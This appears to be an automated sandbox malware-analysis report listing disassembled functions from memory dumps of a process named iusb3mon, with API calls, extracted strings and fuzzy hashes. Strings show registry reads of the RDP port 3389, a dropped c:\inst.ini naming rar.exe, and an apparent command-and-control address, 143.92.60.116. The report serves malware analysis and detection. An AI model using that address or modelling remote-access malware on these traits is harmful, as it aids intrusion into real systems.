Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: MessageSend$CaptureH_prologHelp
String ID:
API String ID: 432264411-0
Opcode ID: bd2419d49820536ca66ead52f79df7a61772e216abaa54b034c7da2360501385
Instruction ID: a87dc417855b6b9d8ff45ef6ef92de106abf2f7c834c79d1d08aa4c5adc78711
Opcode Fuzzy Hash: bd2419d49820536ca66ead52f79df7a61772e216abaa54b034c7da2360501385
Instruction Fuzzy Hash: 4C216571640309BFFBA06F64CC84F7A7BBAEF48754F158628F2519B1E1CAB19C049B20

Function 06D0C0EA Relevance: 9.1, APIs: 6, Instructions: 67COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 06D0C11D
GetLastActivePopup.USER32(?), ref: 06D0C12C
IsWindowEnabled.USER32(?), ref: 06D0C141
EnableWindow.USER32(?,00000000), ref: 06D0C154
GetWindowLongA.USER32(?,000000F0), ref: 06D0C166
GetParent.USER32(?), ref: 06D0C174

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 584bf1b177f1ee9553f6616c6e6d6eba189a92e9af39eebcccb4a4a04acbd04a
Instruction ID: e6826115cffcfd82dc54e9b13c65a4f736d15b2401cbd95ae09d4ac7f061f73f
Opcode Fuzzy Hash: 584bf1b177f1ee9553f6616c6e6d6eba189a92e9af39eebcccb4a4a04acbd04a
Instruction Fuzzy Hash: 0111A032F213215BF7B16B699884B2BB7A89F69AA1F050314ED01D3390DB74C80186E3

Function 06CFEDA1 Relevance: 9.1, APIs: 6, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(0000000C,00100000,00004000,?,?,?,?,06CFB691,06CFB6E5,?,?,?), ref: 06CFEDD9
VirtualFree.KERNEL32(0000000C,00000000,00008000,?,?,?,?,06CFB691,06CFB6E5,?,?,?), ref: 06CFEDE4
HeapFree.KERNEL32(00000000,?,?,?,?,?,06CFB691,06CFB6E5,?,?,?), ref: 06CFEDF1
HeapFree.KERNEL32(00000000,?,?,?,?,06CFB691,06CFB6E5,?,?,?), ref: 06CFEE0D
VirtualFree.KERNEL32(?,00000000,00008000,?,?,06CFB691,06CFB6E5,?,?,?), ref: 06CFEE2E
HeapDestroy.KERNEL32(?,?,06CFB691,06CFB6E5,?,?,?), ref: 06CFEE40

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Free$HeapVirtual$Destroy
String ID:
API String ID: 716807051-0
Opcode ID: 848c23dce2b602702c2bcd945aa760cfb8f2c3fbc47d0b02ec667903f5d0ee8d
Instruction ID: 8c3fd173e6d7aad4a059c98a57dd72ac10d007819a1969c0657b503ca080063c
Opcode Fuzzy Hash: 848c23dce2b602702c2bcd945aa760cfb8f2c3fbc47d0b02ec667903f5d0ee8d
Instruction Fuzzy Hash: 6F11E135A11216BFEBB18F10FC45F05B762F744710F224828F741737A0CA71A988DB44

Function 06D0B866 Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 06D0B875
GetWindow.USER32(?,00000005), ref: 06D0B886
GetDlgCtrlID.USER32(00000000), ref: 06D0B88F
GetWindowLongA.USER32(00000000,000000F0), ref: 06D0B89E
GetWindowRect.USER32(00000000,?), ref: 06D0B8B0
PtInRect.USER32(?,?,?), ref: 06D0B8C0

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 79e5af03e77da4388f8fb29f6c652dee72b1de07ba113c0066777a75ac48a8f9
Instruction ID: 62e083fba07090f72234f6ac85150d5cc16b5a7711952196bf03096fa559d871
Opcode Fuzzy Hash: 79e5af03e77da4388f8fb29f6c652dee72b1de07ba113c0066777a75ac48a8f9
Instruction Fuzzy Hash: 7D018B3290411ABBFB119B64DC08FAE7B6EFF49311F008936FA11D22A4E731D51A8B90

Function 06CF7550 Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 06CF758B

Part of subcall function 06CF91B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF9216
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 06CF922E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 06CF923E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 06CF924E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 06CF925B
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06CF9268
Part of subcall function 06CF91B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF93F3

lstrlenA.KERNEL32(00000080), ref: 06CF75B9
lstrlenA.KERNEL32(00000080), ref: 06CF75C5

Strings

SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s, xrefs: 06CF7585
PortNumber, xrefs: 06CF759F
3389, xrefs: 06CF75BF, 06CF75C4

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Librarylstrlen$FreeLoadwsprintf
String ID: 3389$PortNumber$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s
API String ID: 4274792114-3034822107
Opcode ID: 4fd928f44f1873e1f43d8b4f26535011b821fa5cad3c758f8a08f315318bcec1
Instruction ID: a5851132be36693b349b3e309784d58b64e9c19b3aae621c1f6716588fccad26
Opcode Fuzzy Hash: 4fd928f44f1873e1f43d8b4f26535011b821fa5cad3c758f8a08f315318bcec1
Instruction Fuzzy Hash: BFF0A4B290022877DFA05BA19C09FAB7F2DEF85698F000065FB18B6200D670E516DBF5

Function 06CF8332 Relevance: 9.0, APIs: 6, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(75B30000), ref: 06CF834A
FreeLibrary.KERNEL32(6F4E0000), ref: 06CF8354
FreeLibrary.KERNEL32(?), ref: 06CF835E
FreeLibrary.KERNEL32(?), ref: 06CF8368
FreeLibrary.KERNEL32(75BB0000), ref: 06CF8372
FreeLibrary.KERNEL32(761A0000), ref: 06CF837C

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 64a752e39298a63fc278341b6f5c9701259fbda3b7a7f6213e95d999aba8f432
Instruction ID: c8c52abda105c3b0c807663e4dea59883d5e7a0cbf9b5e2313c55574766a3238
Opcode Fuzzy Hash: 64a752e39298a63fc278341b6f5c9701259fbda3b7a7f6213e95d999aba8f432
Instruction Fuzzy Hash: 07F0E771B117059AEBB0AF7ADC44B17F3FCAF90650B09481DE551D3660DB74E549CA20

Function 06D0B632 Relevance: 9.0, APIs: 6, Instructions: 35COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 06D0B63F
GetSystemMetrics.USER32(0000000C), ref: 06D0B646
GetDC.USER32(00000000), ref: 06D0B65F
GetDeviceCaps.GDI32(00000000,00000058), ref: 06D0B670
GetDeviceCaps.GDI32(00000000,0000005A), ref: 06D0B678
ReleaseDC.USER32(00000000,00000000), ref: 06D0B680

Part of subcall function 06D0CD61: GetSystemMetrics.USER32(00000002), ref: 06D0CD73
Part of subcall function 06D0CD61: GetSystemMetrics.USER32(00000003), ref: 06D0CD7D

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 2c0c6c086520e9caf2110d6fbd619351f948b6072d350d31c95cff5a9b8e6920
Instruction ID: 4fd58eadc26942d3f405cc84146183f497ad9b6f5d8ce98226f08faf98cd67f1
Opcode Fuzzy Hash: 2c0c6c086520e9caf2110d6fbd619351f948b6072d350d31c95cff5a9b8e6920
Instruction Fuzzy Hash: 24F05470540700AEF7606B729C89F1BBBA5EBC5B52F00492EE641872D0CAB0D805CFB1

Function 06CFEBFC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 06CFEC1B
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 06CFEC50
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06CFECB0

Strings

__MSVCRT_HEAP_SELECT, xrefs: 06CFEC4B
__GLOBAL_HEAP_SELECTED, xrefs: 06CFEC8A

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: 58072003068bd45c184a65f1e17c2421e2d23b4758d53383e95c83fe501836f9
Instruction ID: 8e0ecad94a52d5ae327be864918c32810d86443b27d022563eff2b161d57005c
Opcode Fuzzy Hash: 58072003068bd45c184a65f1e17c2421e2d23b4758d53383e95c83fe501836f9
Instruction Fuzzy Hash: 52310371D312987EEBF5A7709C54BED3B689B0E304F2804EEE385D6161E6318B89CB11

Function 06D099BB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000405,00000000,?), ref: 06D09A74
GetWindowLongA.USER32(?,000000FC), ref: 06D09A85
GetWindowLongA.USER32(?,000000FC), ref: 06D09A95
SetWindowLongA.USER32(?,000000FC,?), ref: 06D09AB1

Strings

(, xrefs: 06D09A5F

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: 765fa0e8d5ba0239499da37dedad0305a7895f49bf49172ec451750244f756e9
Instruction ID: d765b38bb38e1a4268f82c3566b865505c9837976122cd02b145546e0dcafc40
Opcode Fuzzy Hash: 765fa0e8d5ba0239499da37dedad0305a7895f49bf49172ec451750244f756e9
Instruction Fuzzy Hash: CB31A531A00300AFEBA0AF65DC94B6DB7A5FF48214F145629E5569B6D2DB70E404CF91

Function 00C0DB3E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,22D6AB0D,?,?,00000000,00C1DA11,000000FF,?,00C0DACE,?,?,00C0DAA2,00000016), ref: 00C0DB73
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C0DB85
FreeLibrary.KERNEL32(00000000,?,00000000,00C1DA11,000000FF,?,00C0DACE,?,?,00C0DAA2,00000016), ref: 00C0DBA7

Strings

mscoree.dll, xrefs: 00C0DB6C
CorExitProcess, xrefs: 00C0DB7D

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 12a605d233afed5aa7804881abf84896fae9a46e898f9d82ae8d4b8432118dd6
Instruction ID: b9783b443ab5e6fb7556d3f90829baad616229a669c6d09f75a6527545f0ad2c
Opcode Fuzzy Hash: 12a605d233afed5aa7804881abf84896fae9a46e898f9d82ae8d4b8432118dd6
Instruction Fuzzy Hash: AB016D72944669FFDB119B94DC09FEEBBB9FB45B20F104625FC22E26D0DB749900CA90

Function 06CF892C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 06CF88DD: EnterCriticalSection.KERNEL32(?,?,?,06CF8958,00000005,00000005), ref: 06CF88E5
Part of subcall function 06CF88DD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,06CF8958,00000005,00000005), ref: 06CF88FD

LoadLibraryA.KERNEL32(ws2_32.dll,00000005,00000005), ref: 06CF895D
GetProcAddress.KERNEL32(00000000,closesocket), ref: 06CF896B
FreeLibrary.KERNEL32(00000000), ref: 06CF897F

Strings

ws2_32.dll, xrefs: 06CF8958
closesocket, xrefs: 06CF8965

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
String ID: closesocket$ws2_32.dll
API String ID: 2819327233-181964208
Opcode ID: 3b2b6b70393d6d1e42489f5cad792fb04824962f74b165fc05c54985d7576d97
Instruction ID: 48bf095904c08efa3bc0bcbf14c9a61a439a20e8ae4f106f71e790407fc0b5b8
Opcode Fuzzy Hash: 3b2b6b70393d6d1e42489f5cad792fb04824962f74b165fc05c54985d7576d97
Instruction Fuzzy Hash: C8F02B765002047BE7505754DC0DFEF7B7DCB85611F000119FF05D2340EAB09608C6A1

Function 06CF386B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 06CF387D
GetSystemMetrics.USER32(00000001), ref: 06CF3881
ChangeDisplaySettingsA.USER32(?,00000000), ref: 06CF38B4
ChangeDisplaySettingsA.USER32(00000000,00000000), ref: 06CF38C9

Strings

, xrefs: 06CF3892

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ChangeDisplayMetricsSettingsSystem
String ID:
API String ID: 2205422386-3916222277
Opcode ID: dfce2ee79a2c65d4606500e6ef8d3bb863e37da59324491e85311208dd5a3509
Instruction ID: ba3289eecfe57c9f2d4446bece876a819041eff8fcf1600217085e146ffaa720
Opcode Fuzzy Hash: dfce2ee79a2c65d4606500e6ef8d3bb863e37da59324491e85311208dd5a3509
Instruction Fuzzy Hash: E7F03071D1432CEAFB60DBA5DC45F8D7BB89B08748F100056A608B71C1D3B095088FE1

Function 06CF2A15 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06CF2661,c:\inst.ini), ref: 06CF2A2B
WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06CF2661,c:\inst.ini), ref: 06CF2A40
CloseHandle.KERNEL32(00000000,?,06CF2661,c:\inst.ini), ref: 06CF2A4D

Strings

C:\\rar.exe, xrefs: 06CF2A3A
c:\inst.ini, xrefs: 06CF2A1B

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\\rar.exe$c:\inst.ini
API String ID: 1065093856-1710477331
Opcode ID: 3d942133e8daff5e107baee0abd90f97cfb964f5469153d8af72c9477155acbc
Instruction ID: 3576f78901161037aff4881a8f4380d80be9e0941c22924a9e7ac6707a91e901
Opcode Fuzzy Hash: 3d942133e8daff5e107baee0abd90f97cfb964f5469153d8af72c9477155acbc
Instruction Fuzzy Hash: F2E0DFB12822287FFA301AB1ACCAFEB7B0EEB016D8F000121FB0499250C6A18D0486B0

Function 06CF7639 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,06CF79A5,?,?,?), ref: 06CF7642
GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 06CF7654
FreeLibrary.KERNEL32(00000000), ref: 06CF7676

Strings

ntdll.dll, xrefs: 06CF763B
RtlGetNtVersionNumbers, xrefs: 06CF764E

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlGetNtVersionNumbers$ntdll.dll
API String ID: 145871493-1263206204
Opcode ID: 6f26e2c081c3919e81de1d11b71bd101b92a4a47a770cd0ca4b76db6363f2c2d
Instruction ID: 8a42ed0b35ee26906376defe180533cdac0cbb5100d049445073066393b4149f
Opcode Fuzzy Hash: 6f26e2c081c3919e81de1d11b71bd101b92a4a47a770cd0ca4b76db6363f2c2d
Instruction Fuzzy Hash: B4E0923220022277E2611B65BC09E9BBFB5DBC1FA1F05041CFE00A2200CB64D84AC6A2

Function 06CF3AE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26sleepmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,0000046D,?,06CF20A0,?,00000000,00000000,?), ref: 06CF3AF1
LocalSize.KERNEL32(00000000), ref: 06CF3B17
Sleep.KERNEL32(00000001,00000000,00000000), ref: 06CF3B2A
LocalFree.KERNEL32(00000000), ref: 06CF3B31

Strings

143.92.60.116, xrefs: 06CF3B05

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Local$AllocFreeSizeSleep
String ID: 143.92.60.116
API String ID: 1864957939-3891370194
Opcode ID: 826d09e5d819eebff7d79e2aaf92c8737b4e1041ce0eb8f5e89a5531c572e2f8
Instruction ID: 9cdf0d8d74582b10ff7bdb7c27565cc9d8e2a67815e5c5163d28150408e7189c
Opcode Fuzzy Hash: 826d09e5d819eebff7d79e2aaf92c8737b4e1041ce0eb8f5e89a5531c572e2f8
